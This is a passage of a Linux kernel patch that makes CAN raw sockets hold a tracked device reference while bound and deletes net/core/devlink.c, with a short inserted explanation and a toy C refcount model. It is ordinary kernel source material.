+diff --git a/net/can/raw.c b/net/can/raw.c
+index 4abab2c3011a3..8c104339d538d 100644
+--- a/net/can/raw.c
++++ b/net/can/raw.c
+@@ -84,6 +84,8 @@ struct raw_sock {
+ 	struct sock sk;
+ 	int bound;
+ 	int ifindex;
++	struct net_device *dev;
++	netdevice_tracker dev_tracker;
+ 	struct list_head notifier;
+ 	int loopback;
+ 	int recv_own_msgs;
+@@ -277,21 +279,24 @@ static void raw_notify(struct raw_sock *ro, unsigned long msg,
+ 	if (!net_eq(dev_net(dev), sock_net(sk)))
+ 		return;
+ 
+-	if (ro->ifindex != dev->ifindex)
++	if (ro->dev != dev)
+ 		return;
+ 
+ 	switch (msg) {
+ 	case NETDEV_UNREGISTER:
+ 		lock_sock(sk);
+ 		/* remove current filters & unregister */
+-		if (ro->bound)
++		if (ro->bound) {
+ 			raw_disable_allfilters(dev_net(dev), dev, sk);
++			netdev_put(dev, &ro->dev_tracker);
++		}
+ 
+ 		if (ro->count > 1)
+ 			kfree(ro->filter);
+ 
+ 		ro->ifindex = 0;
+ 		ro->bound = 0;
++		ro->dev = NULL;
+ 		ro->count = 0;
+ 		release_sock(sk);
+ 
+@@ -337,6 +342,7 @@ static int raw_init(struct sock *sk)
+ 
+ 	ro->bound            = 0;
+ 	ro->ifindex          = 0;
++	ro->dev              = NULL;
+ 
+ 	/* set default filter to single entry dfilter */
+ 	ro->dfilter.can_id   = 0;
+@@ -383,18 +389,14 @@ static int raw_release(struct socket *sock)
+ 	list_del(&ro->notifier);
+ 	spin_unlock(&raw_notifier_lock);
+ 
++	rtnl_lock();
+ 	lock_sock(sk);
+ 
+ 	/* remove current filters & unregister */
+ 	if (ro->bound) {
+-		if (ro->ifindex) {
+-			struct net_device *dev;
+-
+-			dev = dev_get_by_index(sock_net(sk), ro->ifindex);
+-			if (dev) {
+-				raw_disable_allfilters(dev_net(dev), dev, sk);
+-				dev_put(dev);
+-			}
++		if (ro->dev) {
++			raw_disable_allfilters(dev_net(ro->dev), ro->dev, sk);
++			netdev_put(ro->dev, &ro->dev_tracker);
+ 		} else {
+ 			raw_disable_allfilters(sock_net(sk), NULL, sk);
+ 		}
+@@ -405,6 +407,7 @@ static int raw_release(struct socket *sock)
+ 
+ 	ro->ifindex = 0;
+ 	ro->bound = 0;
++	ro->dev = NULL;
+ 	ro->count = 0;
+ 	free_percpu(ro->uniq);
+ 
+@@ -412,6 +415,8 @@ static int raw_release(struct socket *sock)
+ 	sock->sk = NULL;
+ 
+ 	release_sock(sk);
++	rtnl_unlock();
++
+ 	sock_put(sk);
+ 
+ 	return 0;
+@@ -422,6 +427,7 @@ static int raw_bind(struct socket *sock, struct sockaddr *uaddr, int len)
+ 	struct sockaddr_can *addr = (struct sockaddr_can *)uaddr;
+ 	struct sock *sk = sock->sk;
+ 	struct raw_sock *ro = raw_sk(sk);
++	struct net_device *dev = NULL;
+ 	int ifindex;
+ 	int err = 0;
+ 	int notify_enetdown = 0;
+@@ -431,24 +437,23 @@ static int raw_bind(struct socket *sock, struct sockaddr *uaddr, int len)
+ 	if (addr->can_family != AF_CAN)
+ 		return -EINVAL;
+ 
++	rtnl_lock();
+ 	lock_sock(sk);
+ 
+ 	if (ro->bound && addr->can_ifindex == ro->ifindex)
+ 		goto out;
+ 
+ 	if (addr->can_ifindex) {
+-		struct net_device *dev;
+-
+ 		dev = dev_get_by_index(sock_net(sk), addr->can_ifindex);
+ 		if (!dev) {
+ 			err = -ENODEV;
+ 			goto out;
+ 		}
+ 		if (dev->type != ARPHRD_CAN) {
+-			dev_put(dev);
+ 			err = -ENODEV;
+-			goto out;
++			goto out_put_dev;
+ 		}
++
+ 		if (!(dev->flags & IFF_UP))
+ 			notify_enetdown = 1;
+ 
+@@ -456,7 +461,9 @@ static int raw_bind(struct socket *sock, struct sockaddr *uaddr, int len)
+ 
+ 		/* filters set by default/setsockopt */
+ 		err = raw_enable_allfilters(sock_net(sk), dev, sk);
+-		dev_put(dev);
++		if (err)
++			goto out_put_dev;
++
+ 	} else {
+ 		ifindex = 0;
+ 
+@@ -467,26 +474,30 @@ static int raw_bind(struct socket *sock, struct sockaddr *uaddr, int len)
+ 	if (!err) {
+ 		if (ro->bound) {
+ 			/* unregister old filters */
+-			if (ro->ifindex) {
+-				struct net_device *dev;
+-
+-				dev = dev_get_by_index(sock_net(sk),
+-						       ro->ifindex);
+-				if (dev) {
+-					raw_disable_allfilters(dev_net(dev),
+-							       dev, sk);
+-					dev_put(dev);
+-				}
++			if (ro->dev) {
++				raw_disable_allfilters(dev_net(ro->dev),
++						       ro->dev, sk);
++				/* drop reference to old ro->dev */
++				netdev_put(ro->dev, &ro->dev_tracker);
+ 			} else {
+ 				raw_disable_allfilters(sock_net(sk), NULL, sk);
+ 			}
+ 		}
+ 		ro->ifindex = ifindex;
+ 		ro->bound = 1;
++		/* bind() ok -> hold a reference for new ro->dev */
++		ro->dev = dev;
++		if (ro->dev)
++			netdev_hold(ro->dev, &ro->dev_tracker, GFP_KERNEL);
+ 	}
+ 
+- out:
++out_put_dev:
++	/* remove potential reference from dev_get_by_index() */
++	if (dev)
++		dev_put(dev);
++out:
+ 	release_sock(sk);
++	rtnl_unlock();
+ 
+ 	if (notify_enetdown) {
+ 		sk->sk_err = ENETDOWN;
+@@ -552,9 +563,9 @@ static int raw_setsockopt(struct socket *sock, int level, int optname,
+ 		rtnl_lock();
+ 		lock_sock(sk);
+ 
+-		if (ro->bound && ro->ifindex) {
+-			dev = dev_get_by_index(sock_net(sk), ro->ifindex);
+-			if (!dev) {
++		dev = ro->dev;
++		if (ro->bound && dev) {
++			if (dev->reg_state != NETREG_REGISTERED) {
+ 				if (count > 1)
+ 					kfree(filter);
+ 				err = -ENODEV;
+@@ -595,7 +606,6 @@ static int raw_setsockopt(struct socket *sock, int level, int optname,
+ 		ro->count  = count;
+ 
+  out_fil:
+-		dev_put(dev);
+ 		release_sock(sk);
+ 		rtnl_unlock();
+ 
+@@ -613,9 +623,9 @@ static int raw_setsockopt(struct socket *sock, int level, int optname,
+ 		rtnl_lock();
+ 		lock_sock(sk);
+ 
+-		if (ro->bound && ro->ifindex) {
+-			dev = dev_get_by_index(sock_net(sk), ro->ifindex);
+-			if (!dev) {
++		dev = ro->dev;
++		if (ro->bound && dev) {
++			if (dev->reg_state != NETREG_REGISTERED) {
+ 				err = -ENODEV;
+ 				goto out_err;
+ 			}
+@@ -639,7 +649,6 @@ static int raw_setsockopt(struct socket *sock, int level, int optname,
+ 		ro->err_mask = err_mask;
+ 
+  out_err:
+-		dev_put(dev);
+ 		release_sock(sk);
+ 		rtnl_unlock();
+ 
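The raw.c rework stops re-resolving the bound interface from ro->ifindex on every operation and instead pins the struct net_device with a tracked reference (netdev_hold()/netdev_put()) for as long as the socket is bound, under rtnl_lock so unregistration cannot race. A toy refcount model of that pin-while-bound pattern, with invented names in place of the kernel primitives:

#include <stdio.h>

/* Toy device with a reference count; stands in for struct net_device. */
struct device { const char *name; int refcnt; };

static void dev_hold(struct device *d) { d->refcnt++; }
static void dev_put(struct device *d)  { d->refcnt--; }

struct socket_state {
    struct device *dev;    /* pinned while bound, like ro->dev */
    int bound;
};

static void sock_bind(struct socket_state *s, struct device *d)
{
    if (s->bound && s->dev)
        dev_put(s->dev);   /* drop the old pin, as the patch does */
    s->dev = d;
    s->bound = 1;
    if (d)
        dev_hold(d);       /* pin: device stays valid while bound */
}

static void sock_release(struct socket_state *s)
{
    if (s->bound && s->dev)
        dev_put(s->dev);
    s->dev = NULL;
    s->bound = 0;
}

int main(void)
{
    struct device can = { "can0", 1 };
    struct socket_state s = { 0 };

    sock_bind(&s, &can);
    printf("bound: refcnt=%d\n", can.refcnt);    /* 2 */
    sock_release(&s);
    printf("released: refcnt=%d\n", can.refcnt); /* 1 */
    return 0;
}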
+diff --git a/net/core/Makefile b/net/core/Makefile
+index 5857cec87b839..10edd66a8a372 100644
+--- a/net/core/Makefile
++++ b/net/core/Makefile
+@@ -33,7 +33,6 @@ obj-$(CONFIG_LWTUNNEL) += lwtunnel.o
+ obj-$(CONFIG_LWTUNNEL_BPF) += lwt_bpf.o
+ obj-$(CONFIG_DST_CACHE) += dst_cache.o
+ obj-$(CONFIG_HWBM) += hwbm.o
+-obj-$(CONFIG_NET_DEVLINK) += devlink.o
+ obj-$(CONFIG_GRO_CELLS) += gro_cells.o
+ obj-$(CONFIG_FAILOVER) += failover.o
+ obj-$(CONFIG_NET_SOCK_MSG) += skmsg.o
+diff --git a/net/core/devlink.c b/net/core/devlink.c
+deleted file mode 100644
+index 5a4a4b34ac15c..0000000000000
+--- a/net/core/devlink.c
++++ /dev/null
+@@ -1,12547 +0,0 @@
+-// SPDX-License-Identifier: GPL-2.0-or-later
+-/*
+- * net/core/devlink.c - Network physical/parent device Netlink interface
+- *
+- * Heavily inspired by net/wireless/
+- * Copyright (c) 2016 Mellanox Technologies. All rights reserved.
+- * Copyright (c) 2016 Jiri Pirko <jiri@mellanox.com>
+- */
+-
+-#include <linux/etherdevice.h>
+-#include <linux/kernel.h>
+-#include <linux/module.h>
+-#include <linux/types.h>
+-#include <linux/slab.h>
+-#include <linux/gfp.h>
+-#include <linux/device.h>
+-#include <linux/list.h>
+-#include <linux/netdevice.h>
+-#include <linux/spinlock.h>
+-#include <linux/refcount.h>
+-#include <linux/workqueue.h>
+-#include <linux/u64_stats_sync.h>
+-#include <linux/timekeeping.h>
+-#include <rdma/ib_verbs.h>
+-#include <net/netlink.h>
+-#include <net/genetlink.h>
+-#include <net/rtnetlink.h>
+-#include <net/net_namespace.h>
+-#include <net/sock.h>
+-#include <net/devlink.h>
+-#define CREATE_TRACE_POINTS
+-#include <trace/events/devlink.h>
+-
+-#define DEVLINK_RELOAD_STATS_ARRAY_SIZE \
+-	(__DEVLINK_RELOAD_LIMIT_MAX * __DEVLINK_RELOAD_ACTION_MAX)
+-
+-struct devlink_dev_stats {
+-	u32 reload_stats[DEVLINK_RELOAD_STATS_ARRAY_SIZE];
+-	u32 remote_reload_stats[DEVLINK_RELOAD_STATS_ARRAY_SIZE];
+-};
+-
+-struct devlink {
+-	u32 index;
+-	struct list_head port_list;
+-	struct list_head rate_list;
+-	struct list_head sb_list;
+-	struct list_head dpipe_table_list;
+-	struct list_head resource_list;
+-	struct list_head param_list;
+-	struct list_head region_list;
+-	struct list_head reporter_list;
+-	struct mutex reporters_lock; /* protects reporter_list */
+-	struct devlink_dpipe_headers *dpipe_headers;
+-	struct list_head trap_list;
+-	struct list_head trap_group_list;
+-	struct list_head trap_policer_list;
+-	struct list_head linecard_list;
+-	struct mutex linecards_lock; /* protects linecard_list */
+-	const struct devlink_ops *ops;
+-	u64 features;
+-	struct xarray snapshot_ids;
+-	struct devlink_dev_stats stats;
+-	struct device *dev;
+-	possible_net_t _net;
+-	/* Serializes access to devlink instance specific objects such as
+-	 * port, sb, dpipe, resource, params, region, traps and more.
+-	 */
+-	struct mutex lock;
+-	struct lock_class_key lock_key;
+-	u8 reload_failed:1;
+-	refcount_t refcount;
+-	struct completion comp;
+-	struct rcu_head rcu;
+-	char priv[] __aligned(NETDEV_ALIGN);
+-};
+-
+-struct devlink_linecard_ops;
+-struct devlink_linecard_type;
+-
+-struct devlink_linecard {
+-	struct list_head list;
+-	struct devlink *devlink;
+-	unsigned int index;
+-	refcount_t refcount;
+-	const struct devlink_linecard_ops *ops;
+-	void *priv;
+-	enum devlink_linecard_state state;
+-	struct mutex state_lock; /* Protects state */
+-	const char *type;
+-	struct devlink_linecard_type *types;
+-	unsigned int types_count;
+-	struct devlink *nested_devlink;
+-};
+-
+-/**
+- * struct devlink_resource - devlink resource
+- * @name: name of the resource
+- * @id: id, per devlink instance
+- * @size: size of the resource
+- * @size_new: updated size of the resource, reload is needed
+- * @size_valid: valid in case the total size of the resource is valid
+- *              including its children
+- * @parent: parent resource
+- * @size_params: size parameters
+- * @list: parent list
+- * @resource_list: list of child resources
+- * @occ_get: occupancy getter callback
+- * @occ_get_priv: occupancy getter callback priv
+- */
+-struct devlink_resource {
+-	const char *name;
+-	u64 id;
+-	u64 size;
+-	u64 size_new;
+-	bool size_valid;
+-	struct devlink_resource *parent;
+-	struct devlink_resource_size_params size_params;
+-	struct list_head list;
+-	struct list_head resource_list;
+-	devlink_resource_occ_get_t *occ_get;
+-	void *occ_get_priv;
+-};
+-
+-void *devlink_priv(struct devlink *devlink)
+-{
+-	return &devlink->priv;
+-}
+-EXPORT_SYMBOL_GPL(devlink_priv);
+-
+-struct devlink *priv_to_devlink(void *priv)
+-{
+-	return container_of(priv, struct devlink, priv);
+-}
+-EXPORT_SYMBOL_GPL(priv_to_devlink);
+-
+-struct device *devlink_to_dev(const struct devlink *devlink)
+-{
+-	return devlink->dev;
+-}
+-EXPORT_SYMBOL_GPL(devlink_to_dev);
+-
+-static struct devlink_dpipe_field devlink_dpipe_fields_ethernet[] = {
+-	{
+-		.name = "destination mac",
+-		.id = DEVLINK_DPIPE_FIELD_ETHERNET_DST_MAC,
+-		.bitwidth = 48,
+-	},
+-};
+-
+-struct devlink_dpipe_header devlink_dpipe_header_ethernet = {
+-	.name = "ethernet",
+-	.id = DEVLINK_DPIPE_HEADER_ETHERNET,
+-	.fields = devlink_dpipe_fields_ethernet,
+-	.fields_count = ARRAY_SIZE(devlink_dpipe_fields_ethernet),
+-	.global = true,
+-};
+-EXPORT_SYMBOL_GPL(devlink_dpipe_header_ethernet);
+-
+-static struct devlink_dpipe_field devlink_dpipe_fields_ipv4[] = {
+-	{
+-		.name = "destination ip",
+-		.id = DEVLINK_DPIPE_FIELD_IPV4_DST_IP,
+-		.bitwidth = 32,
+-	},
+-};
+-
+-struct devlink_dpipe_header devlink_dpipe_header_ipv4 = {
+-	.name = "ipv4",
+-	.id = DEVLINK_DPIPE_HEADER_IPV4,
+-	.fields = devlink_dpipe_fields_ipv4,
+-	.fields_count = ARRAY_SIZE(devlink_dpipe_fields_ipv4),
+-	.global = true,
+-};
+-EXPORT_SYMBOL_GPL(devlink_dpipe_header_ipv4);
+-
+-static struct devlink_dpipe_field devlink_dpipe_fields_ipv6[] = {
+-	{
+-		.name = "destination ip",
+-		.id = DEVLINK_DPIPE_FIELD_IPV6_DST_IP,
+-		.bitwidth = 128,
+-	},
+-};
+-
+-struct devlink_dpipe_header devlink_dpipe_header_ipv6 = {
+-	.name = "ipv6",
+-	.id = DEVLINK_DPIPE_HEADER_IPV6,
+-	.fields = devlink_dpipe_fields_ipv6,
+-	.fields_count = ARRAY_SIZE(devlink_dpipe_fields_ipv6),
+-	.global = true,
+-};
+-EXPORT_SYMBOL_GPL(devlink_dpipe_header_ipv6);
+-
+-EXPORT_TRACEPOINT_SYMBOL_GPL(devlink_hwmsg);
+-EXPORT_TRACEPOINT_SYMBOL_GPL(devlink_hwerr);
+-EXPORT_TRACEPOINT_SYMBOL_GPL(devlink_trap_report);
+-
+-static const struct nla_policy devlink_function_nl_policy[DEVLINK_PORT_FUNCTION_ATTR_MAX + 1] = {
+-	[DEVLINK_PORT_FUNCTION_ATTR_HW_ADDR] = { .type = NLA_BINARY },
+-	[DEVLINK_PORT_FN_ATTR_STATE] =
+-		NLA_POLICY_RANGE(NLA_U8, DEVLINK_PORT_FN_STATE_INACTIVE,
+-				 DEVLINK_PORT_FN_STATE_ACTIVE),
+-};
+-
+-static const struct nla_policy devlink_selftest_nl_policy[DEVLINK_ATTR_SELFTEST_ID_MAX + 1] = {
+-	[DEVLINK_ATTR_SELFTEST_ID_FLASH] = { .type = NLA_FLAG },
+-};
+-
+-static DEFINE_XARRAY_FLAGS(devlinks, XA_FLAGS_ALLOC);
+-#define DEVLINK_REGISTERED XA_MARK_1
+-#define DEVLINK_UNREGISTERING XA_MARK_2
+-
+-/* devlink instances are open to the access from the user space after
+- * devlink_register() call. Such logical barrier allows us to have certain
+- * expectations related to locking.
+- *
+- * Before *_register() - we are in initialization stage and no parallel
+- * access possible to the devlink instance. All drivers perform that phase
+- * by implicitly holding device_lock.
+- *
+- * After *_register() - users and driver can access devlink instance at
+- * the same time.
+- */
+-#define ASSERT_DEVLINK_REGISTERED(d)                                           \
+-	WARN_ON_ONCE(!xa_get_mark(&devlinks, (d)->index, DEVLINK_REGISTERED))
+-#define ASSERT_DEVLINK_NOT_REGISTERED(d)                                       \
+-	WARN_ON_ONCE(xa_get_mark(&devlinks, (d)->index, DEVLINK_REGISTERED))
+-
+-struct net *devlink_net(const struct devlink *devlink)
+-{
+-	return read_pnet(&devlink->_net);
+-}
+-EXPORT_SYMBOL_GPL(devlink_net);
+-
+-static void __devlink_put_rcu(struct rcu_head *head)
+-{
+-	struct devlink *devlink = container_of(head, struct devlink, rcu);
+-
+-	complete(&devlink->comp);
+-}
+-
+-void devlink_put(struct devlink *devlink)
+-{
+-	if (refcount_dec_and_test(&devlink->refcount))
+-		/* Make sure unregister operation that may await the completion
+-		 * is unblocked only after all users are after the end of
+-		 * RCU grace period.
+-		 */
+-		call_rcu(&devlink->rcu, __devlink_put_rcu);
+-}
+-
+-struct devlink *__must_check devlink_try_get(struct devlink *devlink)
+-{
+-	if (refcount_inc_not_zero(&devlink->refcount))
+-		return devlink;
+-	return NULL;
+-}
+-
+-void devl_assert_locked(struct devlink *devlink)
+-{
+-	lockdep_assert_held(&devlink->lock);
+-}
+-EXPORT_SYMBOL_GPL(devl_assert_locked);
+-
+-#ifdef CONFIG_LOCKDEP
+-/* For use in conjunction with LOCKDEP only e.g. rcu_dereference_protected() */
+-bool devl_lock_is_held(struct devlink *devlink)
+-{
+-	return lockdep_is_held(&devlink->lock);
+-}
+-EXPORT_SYMBOL_GPL(devl_lock_is_held);
+-#endif
+-
+-void devl_lock(struct devlink *devlink)
+-{
+-	mutex_lock(&devlink->lock);
+-}
+-EXPORT_SYMBOL_GPL(devl_lock);
+-
+-int devl_trylock(struct devlink *devlink)
+-{
+-	return mutex_trylock(&devlink->lock);
+-}
+-EXPORT_SYMBOL_GPL(devl_trylock);
+-
+-void devl_unlock(struct devlink *devlink)
+-{
+-	mutex_unlock(&devlink->lock);
+-}
+-EXPORT_SYMBOL_GPL(devl_unlock);
+-
+-static struct devlink *
+-devlinks_xa_find_get(struct net *net, unsigned long *indexp, xa_mark_t filter,
+-		     void * (*xa_find_fn)(struct xarray *, unsigned long *,
+-					  unsigned long, xa_mark_t))
+-{
+-	struct devlink *devlink;
+-
+-	rcu_read_lock();
+-retry:
+-	devlink = xa_find_fn(&devlinks, indexp, ULONG_MAX, DEVLINK_REGISTERED);
+-	if (!devlink)
+-		goto unlock;
+-
+-	/* In case devlink_unregister() was already called and "unregistering"
+-	 * mark was set, do not allow to get a devlink reference here.
+-	 * This prevents live-lock of devlink_unregister() wait for completion.
+-	 */
+-	if (xa_get_mark(&devlinks, *indexp, DEVLINK_UNREGISTERING))
+-		goto retry;
+-
+-	/* For a possible retry, the xa_find_after() should be always used */
+-	xa_find_fn = xa_find_after;
+-	if (!devlink_try_get(devlink))
+-		goto retry;
+-	if (!net_eq(devlink_net(devlink), net)) {
+-		devlink_put(devlink);
+-		goto retry;
+-	}
+-unlock:
+-	rcu_read_unlock();
+-	return devlink;
+-}
+-
+-static struct devlink *devlinks_xa_find_get_first(struct net *net,
+-						  unsigned long *indexp,
+-						  xa_mark_t filter)
+-{
+-	return devlinks_xa_find_get(net, indexp, filter, xa_find);
+-}
+-
+-static struct devlink *devlinks_xa_find_get_next(struct net *net,
+-						 unsigned long *indexp,
+-						 xa_mark_t filter)
+-{
+-	return devlinks_xa_find_get(net, indexp, filter, xa_find_after);
+-}
+-
+-/* Iterate over devlink pointers which were possible to get reference to.
+- * devlink_put() needs to be called for each iterated devlink pointer
+- * in loop body in order to release the reference.
+- */
+-#define devlinks_xa_for_each_get(net, index, devlink, filter)			\
+-	for (index = 0,								\
+-	     devlink = devlinks_xa_find_get_first(net, &index, filter);		\
+-	     devlink; devlink = devlinks_xa_find_get_next(net, &index, filter))
+-
+-#define devlinks_xa_for_each_registered_get(net, index, devlink)		\
+-	devlinks_xa_for_each_get(net, index, devlink, DEVLINK_REGISTERED)
+-
+-static struct devlink *devlink_get_from_attrs(struct net *net,
+-					      struct nlattr **attrs)
+-{
+-	struct devlink *devlink;
+-	unsigned long index;
+-	char *busname;
+-	char *devname;
+-
+-	if (!attrs[DEVLINK_ATTR_BUS_NAME] || !attrs[DEVLINK_ATTR_DEV_NAME])
+-		return ERR_PTR(-EINVAL);
+-
+-	busname = nla_data(attrs[DEVLINK_ATTR_BUS_NAME]);
+-	devname = nla_data(attrs[DEVLINK_ATTR_DEV_NAME]);
+-
+-	devlinks_xa_for_each_registered_get(net, index, devlink) {
+-		if (strcmp(devlink->dev->bus->name, busname) == 0 &&
+-		    strcmp(dev_name(devlink->dev), devname) == 0)
+-			return devlink;
+-		devlink_put(devlink);
+-	}
+-
+-	return ERR_PTR(-ENODEV);
+-}
+-
+-#define ASSERT_DEVLINK_PORT_REGISTERED(devlink_port)				\
+-	WARN_ON_ONCE(!(devlink_port)->registered)
+-#define ASSERT_DEVLINK_PORT_NOT_REGISTERED(devlink_port)			\
+-	WARN_ON_ONCE((devlink_port)->registered)
+-#define ASSERT_DEVLINK_PORT_INITIALIZED(devlink_port)				\
+-	WARN_ON_ONCE(!(devlink_port)->initialized)
+-
+-static struct devlink_port *devlink_port_get_by_index(struct devlink *devlink,
+-						      unsigned int port_index)
+-{
+-	struct devlink_port *devlink_port;
+-
+-	list_for_each_entry(devlink_port, &devlink->port_list, list) {
+-		if (devlink_port->index == port_index)
+-			return devlink_port;
+-	}
+-	return NULL;
+-}
+-
+-static bool devlink_port_index_exists(struct devlink *devlink,
+-				      unsigned int port_index)
+-{
+-	return devlink_port_get_by_index(devlink, port_index);
+-}
+-
+-static struct devlink_port *devlink_port_get_from_attrs(struct devlink *devlink,
+-							struct nlattr **attrs)
+-{
+-	if (attrs[DEVLINK_ATTR_PORT_INDEX]) {
+-		u32 port_index = nla_get_u32(attrs[DEVLINK_ATTR_PORT_INDEX]);
+-		struct devlink_port *devlink_port;
+-
+-		devlink_port = devlink_port_get_by_index(devlink, port_index);
+-		if (!devlink_port)
+-			return ERR_PTR(-ENODEV);
+-		return devlink_port;
+-	}
+-	return ERR_PTR(-EINVAL);
+-}
+-
+-static struct devlink_port *devlink_port_get_from_info(struct devlink *devlink,
+-						       struct genl_info *info)
+-{
+-	return devlink_port_get_from_attrs(devlink, info->attrs);
+-}
+-
+-static inline bool
+-devlink_rate_is_leaf(struct devlink_rate *devlink_rate)
+-{
+-	return devlink_rate->type == DEVLINK_RATE_TYPE_LEAF;
+-}
+-
+-static inline bool
+-devlink_rate_is_node(struct devlink_rate *devlink_rate)
+-{
+-	return devlink_rate->type == DEVLINK_RATE_TYPE_NODE;
+-}
+-
+-static struct devlink_rate *
+-devlink_rate_leaf_get_from_info(struct devlink *devlink, struct genl_info *info)
+-{
+-	struct devlink_rate *devlink_rate;
+-	struct devlink_port *devlink_port;
+-
+-	devlink_port = devlink_port_get_from_attrs(devlink, info->attrs);
+-	if (IS_ERR(devlink_port))
+-		return ERR_CAST(devlink_port);
+-	devlink_rate = devlink_port->devlink_rate;
+-	return devlink_rate ?: ERR_PTR(-ENODEV);
+-}
+-
+-static struct devlink_rate *
+-devlink_rate_node_get_by_name(struct devlink *devlink, const char *node_name)
+-{
+-	static struct devlink_rate *devlink_rate;
+-
+-	list_for_each_entry(devlink_rate, &devlink->rate_list, list) {
+-		if (devlink_rate_is_node(devlink_rate) &&
+-		    !strcmp(node_name, devlink_rate->name))
+-			return devlink_rate;
+-	}
+-	return ERR_PTR(-ENODEV);
+-}
+-
+-static struct devlink_rate *
+-devlink_rate_node_get_from_attrs(struct devlink *devlink, struct nlattr **attrs)
+-{
+-	const char *rate_node_name;
+-	size_t len;
+-
+-	if (!attrs[DEVLINK_ATTR_RATE_NODE_NAME])
+-		return ERR_PTR(-EINVAL);
+-	rate_node_name = nla_data(attrs[DEVLINK_ATTR_RATE_NODE_NAME]);
+-	len = strlen(rate_node_name);
+-	/* Name cannot be empty or decimal number */
+-	if (!len || strspn(rate_node_name, "0123456789") == len)
+-		return ERR_PTR(-EINVAL);
+-
+-	return devlink_rate_node_get_by_name(devlink, rate_node_name);
+-}
+-
+-static struct devlink_rate *
+-devlink_rate_node_get_from_info(struct devlink *devlink, struct genl_info *info)
+-{
+-	return devlink_rate_node_get_from_attrs(devlink, info->attrs);
+-}
+-
+-static struct devlink_rate *
+-devlink_rate_get_from_info(struct devlink *devlink, struct genl_info *info)
+-{
+-	struct nlattr **attrs = info->attrs;
+-
+-	if (attrs[DEVLINK_ATTR_PORT_INDEX])
+-		return devlink_rate_leaf_get_from_info(devlink, info);
+-	else if (attrs[DEVLINK_ATTR_RATE_NODE_NAME])
+-		return devlink_rate_node_get_from_info(devlink, info);
+-	else
+-		return ERR_PTR(-EINVAL);
+-}
+-
+-static struct devlink_linecard *
+-devlink_linecard_get_by_index(struct devlink *devlink,
+-			      unsigned int linecard_index)
+-{
+-	struct devlink_linecard *devlink_linecard;
+-
+-	list_for_each_entry(devlink_linecard, &devlink->linecard_list, list) {
+-		if (devlink_linecard->index == linecard_index)
+-			return devlink_linecard;
+-	}
+-	return NULL;
+-}
+-
+-static bool devlink_linecard_index_exists(struct devlink *devlink,
+-					  unsigned int linecard_index)
+-{
+-	return devlink_linecard_get_by_index(devlink, linecard_index);
+-}
+-
+-static struct devlink_linecard *
+-devlink_linecard_get_from_attrs(struct devlink *devlink, struct nlattr **attrs)
+-{
+-	if (attrs[DEVLINK_ATTR_LINECARD_INDEX]) {
+-		u32 linecard_index = nla_get_u32(attrs[DEVLINK_ATTR_LINECARD_INDEX]);
+-		struct devlink_linecard *linecard;
+-
+-		mutex_lock(&devlink->linecards_lock);
+-		linecard = devlink_linecard_get_by_index(devlink, linecard_index);
+-		if (linecard)
+-			refcount_inc(&linecard->refcount);
+-		mutex_unlock(&devlink->linecards_lock);
+-		if (!linecard)
+-			return ERR_PTR(-ENODEV);
+-		return linecard;
+-	}
+-	return ERR_PTR(-EINVAL);
+-}
+-
+-static struct devlink_linecard *
+-devlink_linecard_get_from_info(struct devlink *devlink, struct genl_info *info)
+-{
+-	return devlink_linecard_get_from_attrs(devlink, info->attrs);
+-}
+-
+-static void devlink_linecard_put(struct devlink_linecard *linecard)
+-{
+-	if (refcount_dec_and_test(&linecard->refcount)) {
+-		mutex_destroy(&linecard->state_lock);
+-		kfree(linecard);
+-	}
+-}
+-
+-struct devlink_sb {
+-	struct list_head list;
+-	unsigned int index;
+-	u32 size;
+-	u16 ingress_pools_count;
+-	u16 egress_pools_count;
+-	u16 ingress_tc_count;
+-	u16 egress_tc_count;
+-};
+-
+-static u16 devlink_sb_pool_count(struct devlink_sb *devlink_sb)
+-{
+-	return devlink_sb->ingress_pools_count + devlink_sb->egress_pools_count;
+-}
+-
+-static struct devlink_sb *devlink_sb_get_by_index(struct devlink *devlink,
+-						  unsigned int sb_index)
+-{
+-	struct devlink_sb *devlink_sb;
+-
+-	list_for_each_entry(devlink_sb, &devlink->sb_list, list) {
+-		if (devlink_sb->index == sb_index)
+-			return devlink_sb;
+-	}
+-	return NULL;
+-}
+-
+-static bool devlink_sb_index_exists(struct devlink *devlink,
+-				    unsigned int sb_index)
+-{
+-	return devlink_sb_get_by_index(devlink, sb_index);
+-}
+-
+-static struct devlink_sb *devlink_sb_get_from_attrs(struct devlink *devlink,
+-						    struct nlattr **attrs)
+-{
+-	if (attrs[DEVLINK_ATTR_SB_INDEX]) {
+-		u32 sb_index = nla_get_u32(attrs[DEVLINK_ATTR_SB_INDEX]);
+-		struct devlink_sb *devlink_sb;
+-
+-		devlink_sb = devlink_sb_get_by_index(devlink, sb_index);
+-		if (!devlink_sb)
+-			return ERR_PTR(-ENODEV);
+-		return devlink_sb;
+-	}
+-	return ERR_PTR(-EINVAL);
+-}
+-
+-static struct devlink_sb *devlink_sb_get_from_info(struct devlink *devlink,
+-						   struct genl_info *info)
+-{
+-	return devlink_sb_get_from_attrs(devlink, info->attrs);
+-}
+-
+-static int devlink_sb_pool_index_get_from_attrs(struct devlink_sb *devlink_sb,
+-						struct nlattr **attrs,
+-						u16 *p_pool_index)
+-{
+-	u16 val;
+-
+-	if (!attrs[DEVLINK_ATTR_SB_POOL_INDEX])
+-		return -EINVAL;
+-
+-	val = nla_get_u16(attrs[DEVLINK_ATTR_SB_POOL_INDEX]);
+-	if (val >= devlink_sb_pool_count(devlink_sb))
+-		return -EINVAL;
+-	*p_pool_index = val;
+-	return 0;
+-}
+-
+-static int devlink_sb_pool_index_get_from_info(struct devlink_sb *devlink_sb,
+-					       struct genl_info *info,
+-					       u16 *p_pool_index)
+-{
+-	return devlink_sb_pool_index_get_from_attrs(devlink_sb, info->attrs,
+-						    p_pool_index);
+-}
+-
+-static int
+-devlink_sb_pool_type_get_from_attrs(struct nlattr **attrs,
+-				    enum devlink_sb_pool_type *p_pool_type)
+-{
+-	u8 val;
+-
+-	if (!attrs[DEVLINK_ATTR_SB_POOL_TYPE])
+-		return -EINVAL;
+-
+-	val = nla_get_u8(attrs[DEVLINK_ATTR_SB_POOL_TYPE]);
+-	if (val != DEVLINK_SB_POOL_TYPE_INGRESS &&
+-	    val != DEVLINK_SB_POOL_TYPE_EGRESS)
+-		return -EINVAL;
+-	*p_pool_type = val;
+-	return 0;
+-}
+-
+-static int
+-devlink_sb_pool_type_get_from_info(struct genl_info *info,
+-				   enum devlink_sb_pool_type *p_pool_type)
+-{
+-	return devlink_sb_pool_type_get_from_attrs(info->attrs, p_pool_type);
+-}
+-
+-static int
+-devlink_sb_th_type_get_from_attrs(struct nlattr **attrs,
+-				  enum devlink_sb_threshold_type *p_th_type)
+-{
+-	u8 val;
+-
